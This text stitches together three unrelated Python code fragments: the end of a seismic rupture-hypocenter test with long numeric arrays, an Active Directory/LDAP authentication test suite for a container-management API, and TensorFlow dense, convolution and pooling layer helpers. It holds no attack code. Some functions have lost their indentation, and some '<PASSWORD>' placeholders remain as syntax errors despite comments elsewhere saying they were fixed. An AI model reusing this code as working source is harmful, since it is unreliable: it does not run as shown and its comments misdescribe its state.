            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728]
    # zip() bounds the loop by the shorter of the two iterables; range(1000)
    # is simply an upper bound on the rupture count.
    for rup, i in zip(src.iter_ruptures(), range(1000)):
        self.assertAlmostEqual(
            rup.hypocenter.longitude, lon[i], delta=0.01)
        self.assertAlmostEqual(rup.hypocenter.latitude, lat[i], delta=0.01)
        self.assertAlmostEqual(rup.hypocenter.depth, dep[i], delta=0.01)
        self.assertAlmostEqual(rup.occurrence_rate, rate[i], delta=0.01)
def test_hypoloc_dip_rupture(self):
source_id = name = 'test-source'
trt = TRT.ACTIVE_SHALLOW_CRUST
dip = 30.
hypo_list = numpy.array([[0.25, 0.25, 0.4], [0.75, 0.75, 0.6]])
slip_list = numpy.array([[90., 1.]])
self.mesh_spacing = 5.
src = SimpleFaultSource(source_id, name, trt,
self.src_mfd, self.mesh_spacing, self.sarea,
1., self.src_tom, self.upper_seismogenic_depth,
self.lower_seismogenic_depth,
self.fault_trace, dip, self.rake, hypo_list,
slip_list)
lon = [0.0899, 0.3148, 0.1349, 0.3597, 0.1799, 0.4047, 0.2248,
0.4497, 0.2698, 0.4946, 0.3148, 0.5396, 0.3597, 0.5846,
0.4047, 0.6295, 0.4497, 0.6745, 0.4946, 0.7195, 0.5396,
0.7644, 0.5846, 0.8094, 0.6295, 0.8544, 0.6745, 0.8993,
0.0899, 0.3148, 0.1349, 0.3597, 0.1799, 0.4047, 0.2248,
0.4497, 0.2698, 0.4946, 0.3148, 0.5396, 0.3597, 0.5846,
0.4047, 0.6295, 0.4497, 0.6745, 0.4946, 0.7195, 0.5396,
0.7644, 0.5846, 0.8094, 0.6295, 0.8544, 0.6745, 0.8993,
0.0899, 0.3148, 0.1349, 0.3597, 0.1799, 0.4047, 0.2248,
0.4497, 0.2698, 0.4946, 0.3148, 0.5396, 0.3597, 0.5846,
0.4047, 0.6295, 0.4497, 0.6745, 0.4946, 0.7195, 0.5396,
0.7644, 0.5846, 0.8094, 0.6295, 0.8544, 0.6745, 0.8993,
0.0899, 0.3148, 0.1349, 0.3597, 0.1799, 0.4047, 0.2248,
0.4497, 0.2698, 0.4946, 0.3148, | |
<reponame>bmdepesa/validation-tests<gh_stars>0
from common_fixtures import * # NOQA
from requests.auth import AuthBase
import ast
# Skip markers: each AD/LDAP test runs only when the corresponding
# environment variable is configured.
if_test_ad = pytest.mark.skipif(not os.environ.get('API_AUTH_AD_SERVER'),
                                reason='API_AUTH_AD_SERVER is not set')
if_do_key = pytest.mark.skipif(
    not os.environ.get('DIGITALOCEAN_KEY'),
    reason="Digital Ocean key is not set")
if_ldap_port = pytest.mark.skipif(
    os.environ.get('LDAP_PORT') != 'True',
    reason="LDAP_PORT is not True")
# Populated once by the session-scoped fixtures below:
# ADMIN_AD_CLIENT by ad_client(), ADMIN_TOKEN by turn_on_off_ad_auth().
ADMIN_AD_CLIENT = None
ADMIN_TOKEN = None
class AdAuth(AuthBase):
    """requests auth hook that attaches an LDAP JWT bearer token
    (and, optionally, a project id header) to every request."""

    def __init__(self, jwt, prj_id=None):
        self.jwt = jwt
        self.prj_id = prj_id

    def __call__(self, r):
        """Add the auth headers to the outgoing request and return it."""
        extra = {'Authorization': 'Bearer ' + self.jwt}
        if self.prj_id is not None:
            extra['X-API-Project-Id'] = self.prj_id
        r.headers.update(extra)
        return r
@pytest.fixture(scope='session', autouse=True)
def ad_client(admin_client):
    """Create an admin API key once per session and cache a client
    built from it in the module-level ADMIN_AD_CLIENT global."""
    global ADMIN_AD_CLIENT
    key = admin_client.create_apiKey()
    admin_client.wait_success(key)
    ADMIN_AD_CLIENT = from_env(url=cattle_url(),
                               access_key=key.publicValue,
                               secret_key=key.secretValue)
def create_ad_client(username=None,
                     password=None,
                     project_id=None):
    """Return a cattle client authenticated as *username* via an LDAP JWT.

    BUG FIX: the *password* default was a redacted ``<PASSWORD>``
    placeholder (a syntax error); it is restored to ``None`` to mirror
    *username*.

    The client starts from the cached admin keys, exchanges the
    username/password for a JWT, then switches to bearer-token auth
    (optionally scoped to *project_id*).
    """
    client = from_env(url=cattle_url(),
                      access_key=ADMIN_AD_CLIENT._access_key,
                      secret_key=ADMIN_AD_CLIENT._secret_key)
    client.delete_by_id = delete_by_id
    assert client.valid()
    jwt = get_authed_token(username=username, password=password)['jwt']
    # Drop the admin keys and switch to JWT bearer auth.
    client._access_key = None
    client._secret_key = None
    client._auth = AdAuth(jwt, prj_id=project_id)
    client.reload_schema()
    assert client.valid()
    # The authenticated user must be able to list at least one identity.
    identities = client.list_identity()
    assert len(identities) > 0
    return client
def get_authed_token(username=None, password=None):
    """POST credentials to /token and return the parsed token payload,
    asserting the login succeeded for the expected user."""
    resp = requests.post(cattle_url() + '/token', {
        'authProvider': "ldapconfig",
        'code': username + ':' + password
    })
    assert resp.ok
    token = resp.json()
    assert token['type'] != 'error'
    assert token['user'] == username
    assert token['userIdentity']['login'] == username
    return token
def delete_ldap_token(id, cookies):
    """DELETE /token/<id> and verify the server cleared the token cookie."""
    resp = requests.delete(cattle_url() + '/token/' + id, cookies=cookies)
    assert resp.status_code == 204
    # No "token" cookie may remain, and the response must expire it.
    assert "token" not in [c.name for c in resp.cookies]
    assert "token=;Path=/;Expires=Thu, 01 Jan 1970 00:00:00 GMT;" \
        in resp.headers['set-cookie']
def load_config(access_mode="unrestricted"):
    """Build the LDAP auth configuration from environment variables.

    When LDAP_PORT == 'True' the config is wrapped in the v1-auth payload
    shape; otherwise the flat ldapconfig dict (with accessMode/enabled
    set) is returned.
    """
    env = os.environ.get
    config = {
        'server': env('API_AUTH_AD_SERVER'),
        'domain': env('API_AUTH_AD_SEARCH_BASE'),
        'loginDomain': env('API_AUTH_AD_LOGIN_DOMAIN'),
        'port': int(env('API_AUTH_AD_PORT')),
        'serviceAccountPassword': env('API_AUTH_AD_SERVICE_ACCOUNT_PASSWORD'),
        'serviceAccountUsername': env('API_AUTH_AD_SERVICE_ACCOUNT_USERNAME'),
        'groupNameField': env('SCHEMA_AD_GROUP_NAME_FIELD'),
        'groupObjectClass': env('SCHEMA_AD_GROUP_OBJECT_CLASS'),
        'groupSearchField': env('SCHEMA_AD_GROUP_SEARCH_FIELD'),
        'groupDNField': env('SCHEMA_AD_GROUP_DN_FIELD'),
        'tls': env('API_AUTH_AD_TLS') == 'True',
        'groupMemberMappingAttribute': "memberUid",
        'groupMemberUserAttribute': env('SCHEMA_AD_GROUP_MEMBER_USER_ATTRIBUTE'),
        'groupSearchDomain': env('API_AUTH_AD_GROUP_SEARCH_BASE'),
        'userDisabledBitMask': int(env('SCHEMA_AD_USER_DISABLED_STATUS_BITMASK')),
        'userEnabledAttribute': None,
        'userLoginField': env('SCHEMA_AD_USER_LOGIN_FIELD'),
        'userNameField': env('SCHEMA_AD_USER_NAME_FIELD'),
        'userObjectClass': env('SCHEMA_AD_USER_OBJECT_CLASS'),
        'userSearchField': env('SCHEMA_AD_USER_SEARCH_FIELD'),
        'userMemberAttribute': "memberOf"
    }
    if env('LDAP_PORT') == 'True':
        # v1-auth endpoint expects the full wrapped payload.
        return {
            "accessMode": access_mode,
            "allowedIdentities": [],
            "enabled": True,
            "provider": "ldapconfig",
            "ldapconfig": config,
            "githubConfig": {},
            "shibbolethConfig": {},
            "type": "config"
        }
    config['accessMode'] = access_mode
    config['enabled'] = True
    return config
def load_test_api_config(auth_config):
    """Wrap *auth_config* in the testAuthConfig payload used by the
    v1-auth/testlogin endpoint, using the AD main user's credentials."""
    user = os.environ.get('AD_MAIN_USER')
    password = os.environ.get('AD_MAIN_PASS')
    return {
        "authConfig": auth_config,
        "code": user + ":" + password,
        "type": "testAuthConfig"
    }
def idToMember(identity, role):
    """Convert an identity resource into a project-member dict with *role*."""
    return dict(externalId=identity.externalId,
                externalIdType=identity.externalIdType,
                role=role)
@pytest.fixture(scope='session', autouse=True)
def turn_on_off_ad_auth(admin_client, request):
    """Session fixture: disable AD auth, log the main AD user in, re-enable
    auth with that user allowed, and restore the original state on teardown.

    BUG FIXES: redacted ``<PASSWORD>`` placeholders (syntax errors) are
    restored — ``os.environ.get('AD_MAIN_PASS')`` for reading the password
    and ``ldap_main_pass`` at both call sites that pass it on.
    """
    ldap_main_user = os.environ.get('AD_MAIN_USER')
    ldap_main_pass = os.environ.get('AD_MAIN_PASS')
    # Disable AD Authentication
    config = load_config()
    config['enabled'] = False
    ldap_port = os.environ.get('LDAP_PORT')
    if ldap_port == 'True':
        auth_url = cattle_url()[:-7] + 'v1-auth/config'
        r = requests.post(auth_url, data=json.dumps(config))
        assert r.ok
    else:
        admin_client.create_ldapconfig(config)
    # Log in as the main AD user and remember the token for other tests.
    token = get_authed_token(username=ldap_main_user,
                             password=ldap_main_pass)
    user = token['userIdentity']
    global ADMIN_TOKEN
    ADMIN_TOKEN = token
    # Enable AD Authentication with the main user in allowedIdentities.
    allowed_identities = []
    allowed_identities.append(user)
    config['enabled'] = True
    config['allowedIdentities'] = allowed_identities
    if ldap_port == 'True':
        auth_url = cattle_url()[:-7] + 'v1-auth/config'
        r = requests.post(auth_url, data=json.dumps(config))
        assert r.ok
    else:
        admin_client.create_ldapconfig(config)

    def fin():
        # Teardown: clear the enabled flag so auth returns to its
        # pre-session state.
        config = load_config()
        config['enabled'] = None
        access_key = ADMIN_AD_CLIENT._access_key
        secret_key = ADMIN_AD_CLIENT._secret_key
        ldap_port = os.environ.get('LDAP_PORT')
        if ldap_port == 'True':
            auth_url = cattle_url()[:-7] + 'v1-auth/config'
            r = requests.post(auth_url, data=json.dumps(config),
                              auth=(access_key, secret_key))
            assert r.ok
        else:
            client = create_ad_client(username=ldap_main_user,
                                      password=ldap_main_pass)
            client.create_ldapconfig(config)

    request.addfinalizer(fin)
def reconfigure_ad(admin_client, domain, groupSearchDomain):
    """Point the AD configuration at a different search base / group base.

    On the v1-auth path the new settings are validated via the testlogin
    endpoint before being posted; otherwise the ldapconfig resource is
    recreated through the admin client.
    """
    if os.environ.get('LDAP_PORT') == 'True':
        # Use testlogin api
        auth_config = load_config()
        auth_config['ldapconfig']['domain'] = domain
        auth_config['ldapconfig']['groupSearchDomain'] = groupSearchDomain
        creds = (ADMIN_AD_CLIENT._access_key, ADMIN_AD_CLIENT._secret_key)
        resp = requests.post(cattle_url()[:-7] + 'v1-auth/testlogin',
                             data=json.dumps(load_test_api_config(auth_config)),
                             auth=creds)
        assert resp.ok
        config = load_config()
        config['ldapconfig']['domain'] = domain
        config['ldapconfig']['groupSearchDomain'] = groupSearchDomain
        resp = requests.post(cattle_url()[:-7] + 'v1-auth/config',
                             data=json.dumps(config), auth=creds)
        assert resp.ok
        return
    # Non-v1-auth path: clear, then re-enable with the new domains.
    config = load_config()
    config['enabled'] = None
    admin_client.create_ldapconfig(config)
    config['enabled'] = True
    config['allowedIdentities'] = [ADMIN_TOKEN['userIdentity']]
    config['domain'] = domain
    config['groupSearchDomain'] = groupSearchDomain
    admin_client.create_ldapconfig(config)
    return admin_client
# 1
@if_test_ad
def test_allow_any_ad_user(admin_client):
    """Any valid AD user can authenticate and read the API schemas."""
    ldap_user2 = os.environ.get('AD_USER2')
    ldap_pass2 = os.environ.get('AD_PASS2')
    # FIX: the redacted '<PASSWORD>' placeholder is restored to the
    # env-provided password read (and otherwise unused) just above.
    token = get_authed_token(username=ldap_user2,
                             password=ldap_pass2)
    cookies = dict(token=token['jwt'])
    schemas = requests.get(cattle_url() + "schemas", cookies=cookies)
    assert schemas.status_code == 200
@if_test_ad
def test_ad_delete_token_on_logout(admin_client):
    """Logging out invalidates the JWT: later requests must get 401."""
    ldap_user2 = os.environ.get('AD_USER2')
    ldap_pass2 = os.environ.get('AD_PASS2')
    # FIX: restored the redacted password argument to ldap_pass2.
    token = get_authed_token(username=ldap_user2,
                             password=ldap_pass2)
    cookies = dict(token=token['jwt'])
    identities = requests.get(cattle_url() + "identities", cookies=cookies)
    assert identities.status_code == 200
    # Revoke the current token server-side, then prove it is now rejected.
    delete_ldap_token("current", cookies)
    identities = requests.get(cattle_url() + "identities", cookies=cookies)
    assert identities.status_code == 401
# 4
@if_test_ad
def test_ad_user_with_new_env(admin_client):
    """A fresh AD user gets a '<user>-Default' environment on first login."""
    ldap_user3 = os.environ.get('AD_USER3')
    ldap_pass3 = os.environ.get('AD_PASS3')
    # test creation of new env with new valid user
    # FIX: restored both redacted password arguments to ldap_pass3.
    token = get_authed_token(username=ldap_user3,
                             password=ldap_pass3)
    cookies = dict(token=token['jwt'])
    schemas = requests.get(cattle_url() + "schemas", cookies=cookies)
    assert schemas.status_code == 200
    u3_client = create_ad_client(username=ldap_user3,
                                 password=ldap_pass3)
    projects = u3_client.list_project()
    found = False
    for p in projects:
        if p['name'] == ldap_user3 + "-Default":
            found = True
            break
    assert found
# 5
@if_test_ad
def test_ad_create_new_env(admin_client):
    """An AD user can create a project and becomes its sole owner."""
    ldap_user3 = os.environ.get('AD_USER3')
    ldap_pass3 = os.environ.get('AD_PASS3')
    # FIX: restored the redacted password argument to ldap_pass3.
    u3_client = create_ad_client(username=ldap_user3,
                                 password=ldap_pass3)
    # Find the user's own ldap identity to use as project owner.
    u3_identity = None
    for obj in u3_client.list_identity():
        if obj.externalIdType == 'ldap_user':
            u3_identity = obj
            break
    # Creating a new project
    project_name = random_str() + '-test_case5'
    project = u3_client.create_project(name=project_name, members=[
        idToMember(u3_identity, 'owner')
    ])
    u3_client.wait_success(project)
    assert u3_client.by_id('project', project.id) is not None
    projects = u3_client.list_project()
    found = False
    for p in projects:
        if p['name'] == project_name:
            found = True
            assert len(p.members) == 1
            assert p['members'][0]['role'] == 'owner'
            break
    assert found
# 6
@if_test_ad
def test_ad_create_new_env_add_member(admin_client):
    """A plain 'member' can see a project but cannot manage its members."""
    ldap_user2 = os.environ.get('AD_USER2')
    ldap_pass2 = os.environ.get('AD_PASS2')
    ldap_user3 = os.environ.get('AD_USER3')
    ldap_pass3 = os.environ.get('AD_PASS3')
    # FIX: restored both redacted password arguments to the matching
    # env-provided passwords read just above.
    u2_client = create_ad_client(username=ldap_user2,
                                 password=ldap_pass2)
    u2_identity = None
    for obj in u2_client.list_identity():
        if obj.externalIdType == 'ldap_user':
            u2_identity = obj
            break
    u3_client = create_ad_client(username=ldap_user3,
                                 password=ldap_pass3)
    u3_identity = None
    for obj in u3_client.list_identity():
        if obj.externalIdType == 'ldap_user':
            u3_identity = obj
            break
    # Creating a new project
    project_name = random_str() + '-test_case6'
    project = u2_client.create_project(name=project_name, members=[
        idToMember(u2_identity, 'owner')
    ])
    u2_client.wait_success(project)
    assert u2_client.by_id('project', project.id) is not None
    projects = u2_client.list_project()
    found = False
    for p in projects:
        if p['name'] == project_name:
            found = True
            assert len(p.members) == 1
            assert p['members'][0]['role'] == 'owner'
            break
    assert found
    # Add new member as member
    new_members = [
        idToMember(u2_identity, 'owner'),
        idToMember(u3_identity, 'member')
    ]
    project = u2_client.by_id('project', project.id)
    project.setmembers(members=new_members)
    assert u2_client.by_id('project', project.id) is not None
    assert u3_client.by_id('project', project.id) is not None
    projects = u3_client.list_project()
    found = False
    for p in projects:
        if p['name'] == project_name:
            found = True
    assert found
    # Make sure the new user has no privileges: the 'setmembers' action is
    # absent from the member's view of the project, so the attribute access
    # itself raises.
    project = u3_client.by_id('project', project.id)
    with pytest.raises(AttributeError) as excinfo:
        project.setmembers(members=new_members)
    assert "object has no attribute" in str(excinfo.value)
# 7
@if_test_ad
def test_ad_create_new_env_add_owner(admin_client):
    """A second 'owner' of a project can add further members himself."""
    ldap_user2 = os.environ.get('AD_USER2')
    ldap_pass2 = os.environ.get('AD_PASS2')
    ldap_user3 = os.environ.get('AD_USER3')
    ldap_pass3 = os.environ.get('AD_PASS3')
    ldap_user4 = os.environ.get('AD_USER4')
    ldap_pass4 = os.environ.get('AD_PASS4')
    # FIX: restored all three redacted password arguments to the matching
    # env-provided passwords read just above.
    u2_client = create_ad_client(username=ldap_user2,
                                 password=ldap_pass2)
    u2_identity = None
    for obj in u2_client.list_identity():
        if obj.externalIdType == 'ldap_user':
            u2_identity = obj
            break
    u3_client = create_ad_client(username=ldap_user3,
                                 password=ldap_pass3)
    u3_identity = None
    for obj in u3_client.list_identity():
        if obj.externalIdType == 'ldap_user':
            u3_identity = obj
            break
    u4_client = create_ad_client(username=ldap_user4,
                                 password=ldap_pass4)
    u4_identity = None
    for obj in u4_client.list_identity():
        if obj.externalIdType == 'ldap_user':
            u4_identity = obj
            break
    # Creating a new project
    project_name = random_str() + '-test_case7'
    project = u2_client.create_project(name=project_name, members=[
        idToMember(u2_identity, 'owner')
    ])
    u2_client.wait_success(project)
    assert u2_client.by_id('project', project.id) is not None
    projects = u2_client.list_project()
    found = False
    for p in projects:
        if p['name'] == project_name:
            found = True
            assert len(p.members) == 1
            assert p['members'][0]['role'] == 'owner'
            break
    assert found
    # Add new member as member
    new_members = [
        idToMember(u2_identity, 'owner'),
        idToMember(u3_identity, 'owner')
    ]
    project = u2_client.by_id('project', project.id)
    project.setmembers(members=new_members)
    assert u2_client.by_id('project', project.id) is not None
    assert u3_client.by_id('project', project.id) is not None
    projects = u3_client.list_project()
    found = False
    for p in projects:
        if p['name'] == project_name:
            found = True
    assert found
    # Make sure the new user has privileges to add new members
    new_members = [
        idToMember(u2_identity, 'owner'),
        idToMember(u3_identity, 'owner'),
        idToMember(u4_identity, 'member')
    ]
    same_project = u3_client.by_id('project', project.id)
    same_project.setmembers(members=new_members)
    projects = u4_client.list_project()
    found = False
    for p in projects:
        if p['name'] == project_name:
            found = True
    assert found
# 8
@if_test_ad
def test_ad_create_new_env_add_group_member(admin_client):
ldap_main_user = os.environ.get('AD_MAIN_USER')
ldap_main_pass = os.environ.get('AD_MAIN_PASS')
ldap_user2 = os.environ.get('AD_USER2')
ldap_pass2 = os.environ.get('AD_PASS2')
group = os.environ.get('AD_GROUP')
main_client = create_ad_client(username=ldap_main_user,
password=<PASSWORD>)
main_identity = None
for obj in main_client.list_identity():
if obj.externalIdType == 'ldap_user':
main_identity = obj
break
# Creating a new project
project_name = random_str() + '-test_case8'
project = main_client.create_project(name=project_name, members=[
idToMember(main_identity, 'owner')
])
main_client.wait_success(project)
assert main_client.by_id('project', project.id) is not None
# Add new group as member
group_identity = main_client.list_identity(name=group)[0]
new_members = [
idToMember(main_identity, 'owner'),
idToMember(group_identity, 'member')
]
project = main_client.by_id('project', project.id)
project.setmembers(members=new_members)
u2_client = create_ad_client(username=ldap_user2,
password=<PASSWORD>)
projects = u2_client.list_project()
found = False
for p in projects:
if p['name'] == project_name:
found = True
assert found
project = u2_client.by_id('project', project.id)
with pytest.raises(AttributeError) as excinfo:
project.setmembers(members=new_members)
assert "object | |
"""Building blocks for various Neural Network architectures.
Author: <NAME>
Contact: <EMAIL>
Date: May 2018
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import itertools
import numpy as np
import tensorflow as tf
from . import _globals
from . import utils
# ==============================================================================
# FEEDFORWARD BLOCKS
# ------------------------------------------------------------------------------
def dense_layer(
        x_input,
        n_units,
        activation=None,
        kernel_initializer=None,
        bias_initializer=tf.zeros_initializer(),
        kernel_regularizer=None,
        bias_regularizer=None,
        name=None):
    """Fully connected layer: ``activation(x_input @ kernel + bias)``.

    Args:
        x_input: 2-D tensor of shape [batch, n_inputs].
        n_units: Number of output units.
        activation: Optional callable applied to the linear output; if None
            the raw linear output is returned.
        kernel_initializer/bias_initializer: Variable initializers (None
            falls back to the tf.get_variable default).
        kernel_regularizer/bias_regularizer: Optional regularizers.
        name: Optional name for the returned tensor.

    Returns:
        2-D tensor of shape [batch, n_units].
    """
    # Get number of input features, and create layer kernel and bias variables
    n_inputs = int(x_input.get_shape()[1])
    kernel = tf.get_variable(
        name='kernel', shape=(n_inputs, n_units), dtype=_globals.TF_FLOAT,
        initializer=kernel_initializer, regularizer=kernel_regularizer)
    bias = tf.get_variable(
        name='bias', shape=(n_units,), dtype=_globals.TF_FLOAT,
        initializer=bias_initializer, regularizer=bias_regularizer)
    # Return a tensor that computes linear/activated weighted input plus bias term
    x_linear = tf.matmul(x_input, kernel) + bias
    # FIX: the original unconditionally reassigned x_out = x_linear after the
    # activation branch, silently discarding the activation. Restore the else.
    if activation is not None:
        x_out = activation(x_linear)
    else:
        x_out = x_linear
    return x_out if name is None else tf.identity(x_out, name=name)
def hidden_layers(
        x_input,
        n_layer_units,
        activation=None,
        kernel_initializer=None,
        bias_initializer=tf.zeros_initializer(),
        kernel_regularizer=None,
        bias_regularizer=None,
        keep_prob=None,
        batch_norm=None,
        bn_option_dict=None,
        training=False,
        layer_var_scope_prefix='hidden'):
    """Stack of fully connected layers on the flattened input.

    Args:
        x_input: Input tensor; flattened to [batch, -1] before the first layer.
        n_layer_units: Sequence of unit counts, one per hidden layer.
        activation: Single callable shared by all layers, a list of callables
            (one per layer), or None for purely linear layers.
        keep_prob: If not None, a dropout layer (with this keep probability)
            follows every hidden layer.
        batch_norm: One of [None, 'before', 'after'] — where to apply batch
            normalization relative to the activation.
        bn_option_dict: Extra kwargs for tf.layers.batch_normalization.
        training: Bool (or placeholder) forwarded to batch norm / dropout.
        layer_var_scope_prefix: Variable-scope prefix; layer i lives in
            '<prefix><i>'.

    Returns:
        Output tensor of the last hidden layer.

    TODO(rpeloff) for batch_norm='after', see: https://github.com/ducha-aiki/caffenet-benchmark/blob/master/batchnorm.md
    """
    # Check if list of activations specified for each layer, else duplicate activation for layers
    layers = n_layer_units
    n_layers = np.shape(n_layer_units)[0]
    if utils.is_list_like(activation):
        n_activations = np.shape(activation)[0]
        if n_activations != n_layers:
            raise ValueError(
                "List of activations does not match number of hidden layers. "
                "Got {} activations, expected {}.".format(n_activations, n_layers))
        layers = zip(layers, activation)
    else:
        layers = itertools.zip_longest(layers, [], fillvalue=activation)
    # Check batch norm type is valid
    batch_norm_types = [None, 'before', 'after']
    if batch_norm not in batch_norm_types:
        raise ValueError(
            "Invalid batch norm type: {}. "
            "Expected one of: {}.".format(batch_norm, batch_norm_types))
    # Sequentially build each hidden layer upon the previous layer (initially the flattened input layer)
    x_out = tf.layers.flatten(x_input)
    for index, layer in enumerate(layers):
        n_units, activation_func = layer
        with tf.variable_scope('{}{}'.format(layer_var_scope_prefix, index)):
            # Create linear layer (activation postponed till after potential batch norm)
            x_out = dense_layer(x_input=x_out,
                                n_units=n_units,
                                activation=None,
                                kernel_initializer=kernel_initializer,
                                bias_initializer=bias_initializer,
                                kernel_regularizer=kernel_regularizer,
                                bias_regularizer=bias_regularizer,
                                name='dense')
            # Batch norm before activation/non-linearity
            if batch_norm == 'before':
                x_out = tf.layers.batch_normalization(inputs=x_out,
                                                      training=training,
                                                      name='batch_norm',
                                                      **(bn_option_dict or {}))
            # Postponed activation/non-linearity.
            # FIX: the original called activation_func unconditionally, which
            # raised TypeError when activation was left at its default None
            # (zip_longest fills the per-layer activation with None).
            if activation_func is not None:
                x_out = tf.identity(activation_func(x_out), name='activation')
            # Batch norm after activation/non-linearity
            if batch_norm == 'after':
                x_out = tf.layers.batch_normalization(inputs=x_out,
                                                      training=training,
                                                      name='batch_norm',
                                                      **(bn_option_dict or {}))
            # Dropout layer if specified
            if keep_prob is not None:
                x_out = dropout_layer(x_input=x_out,
                                      keep_prob=keep_prob,
                                      training=training,
                                      name='dropout')
    return x_out
# ==============================================================================
# CONVOLUTIONAL BLOCKS
# ------------------------------------------------------------------------------
def conv2d_layer(
        x_input,
        n_filters,
        kernel_size,  # kernel_shape=(3,3) same as kernel_shape=3
        strides=(1, 1),  # same as strides=1
        padding='valid',
        activation=None,
        kernel_initializer=None,
        bias_initializer=tf.zeros_initializer(),
        kernel_regularizer=None,
        bias_regularizer=None,
        name=None):
    """2-D convolution layer with bias and optional activation.

    Args:
        x_input: 4-D tensor in channels-last layout [batch, height, width, in_channels].
        n_filters: Number of output channels.
        kernel_size: Scalar or (height, width) pair for the filter window.
        strides: Scalar or (stride_height, stride_width) pair.
        padding: 'valid' or 'same' (case-insensitive).
        activation: Optional callable applied after the bias add.
        name: Optional name for the returned tensor.

    Returns:
        4-D tensor of convolved (and optionally activated) features.
    """
    # Check the padding type is valid
    padding = padding.upper()
    padding_types = ['VALID', 'SAME']
    if padding.upper() not in padding_types:
        raise ValueError(
            "Invalid padding type (case-insensitive): {}. "
            "Expected one of: {}.".format(padding, padding_types))
    # Get convolution window shape based on kernel_size and number of input and output channels/filters
    in_channels = int(x_input.get_shape()[-1])
    kernel_shape = (kernel_size, kernel_size) if np.shape(kernel_size) == () else tuple(kernel_size)
    kernel_shape += (in_channels, n_filters)  # := [height, width, in_channels, out_channels]
    # Create layer kernel (filters) and bias variables
    kernel = tf.get_variable(
        name='kernel', shape=kernel_shape, dtype=_globals.TF_FLOAT,
        initializer=kernel_initializer, regularizer=kernel_regularizer)
    bias = tf.get_variable(
        name='bias', shape=(n_filters,), dtype=_globals.TF_FLOAT,
        initializer=bias_initializer, regularizer=bias_regularizer)
    # Get stride shape from strides scalar or tuple
    strides_shape = [1,] + ([strides, strides] if np.shape(strides) == () else list(strides)) + [1,]
    # Return a tensor that computes linear/activated 2D convolution on the input plus a bias term
    x_conv = tf.nn.conv2d(input=x_input,
                          filter=kernel,
                          strides=strides_shape,
                          padding=padding,
                          data_format='NHWC')
    x_conv = tf.nn.bias_add(x_conv, bias)
    # FIX: the original unconditionally reassigned x_out = x_conv after the
    # activation branch, silently discarding the activation. Restore the else.
    if activation is not None:
        x_out = activation(x_conv)
    else:
        x_out = x_conv
    return x_out if name is None else tf.identity(x_out, name=name)
def _pooling2d_layer(
        x_input,
        pooling_func,
        pool_size,
        strides=None,
        padding='valid',
        name=None):
    """Shared driver for the 2-D pooling wrappers (channels-last layout).

    Validates the padding string, expands scalar/tuple window and stride
    specs into NHWC form, and delegates to the given tf.nn pooling op.
    """
    def _nhwc_window(size):
        # Expand a scalar or (height, width) pair into [1, h, w, 1].
        dims = [size, size] if np.shape(size) == () else list(size)
        return [1] + dims + [1]

    # Normalize and validate the padding type.
    padding = padding.upper()
    padding_types = ['VALID', 'SAME']
    if padding.upper() not in padding_types:
        raise ValueError(
            "Invalid padding type (case-insensitive): {}. "
            "Expected one of: {}.".format(padding, padding_types))
    # Window spec; strides default to the window size (non-overlapping).
    pool_shape = _nhwc_window(pool_size)
    strides_shape = _nhwc_window(pool_size if strides is None else strides)
    return pooling_func(value=x_input,
                        ksize=pool_shape,
                        strides=strides_shape,
                        padding=padding,
                        data_format='NHWC',
                        name=name)
def max_pooling2d_layer(
        x_input,
        pool_size,
        strides=None,
        padding='valid',
        name=None):
    """2-D max pooling over a channels-last input.

    Passing strides=None uses pool_size as the stride, i.e. non-overlapping
    pooling windows.
    """
    return _pooling2d_layer(x_input=x_input,
                            pooling_func=tf.nn.max_pool,
                            pool_size=pool_size,
                            strides=strides,
                            padding=padding,
                            name=name)
def avg_pooling2d_layer(
        x_input,
        pool_size,
        strides=None,
        padding='valid',
        name=None):
    """2-D average pooling over a channels-last input.

    Passing strides=None uses pool_size as the stride, i.e. non-overlapping
    pooling windows.
    """
    return _pooling2d_layer(x_input=x_input,
                            pooling_func=tf.nn.avg_pool,
                            pool_size=pool_size,
                            strides=strides,
                            padding=padding,
                            name=name)
def global_pooling2d_layer():
    """Not implemented yet: global (per-channel) 2-D pooling.

    Intended to pool each channel over its full spatial extent, producing
    output of shape [1, 1, channels_in], per the TODO notes below.
    """
    # TODO(rpeloff) max/Avg. Pooling across entire channel to produce output of shape [1, 1, channels_in]
    # TODO(rpeloff) makes it easier to test different input padding lengths without calculating
    # filter size for final pool layer over remaining units every time
    pass
def convolutional_layers(
x_input,
input_shape, # tuple of (height, width, channels), e.g. (128, 128, 3) for 128x128 RGB images
# conv layers
n_layer_filters, # list of integers specifying number of output filters after each conv layer
layer_kernel_sizes, # list of integers/tuples specifying conv kernel size of cnn layer
layer_conv_strides=(1, 1), # integer/tuple, or list of integers/tuples
layer_conv_paddings='valid', # string or list of strings specifying conv padding of each cnn layer
# pooling
layer_pool_sizes=None, # list of integers/tuples specifying pool size of each cnn layer (None specifies no pooling in the cnn layers)
layer_pool_strides=None, # integer/tuple, or list of integers/tuples (None defaults to use layer_pool_size)
layer_pool_paddings='valid', # string or list of strings specifying pool padding of each cnn layer
layer_pool_type='max', # String, one of ['max', 'avg', 'avg_last'], specifying pool type in the cnn layers
# general
activation=None, # callable, or list of callables specifying activation after conv in each cnn layer
kernel_initializer=None, # None specifies tf.get_variable default initializer (Likely tf.glorot_uniform_initializer)
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
# regularization
keep_prob=None, # float, include dropout layers after cnn layers with specified keep probability (None specifies no dropout layers)
drop_channels=None, # boolean, specifies whether to dropout spatially (i.e. dropout entire channels) instead of standard dropout
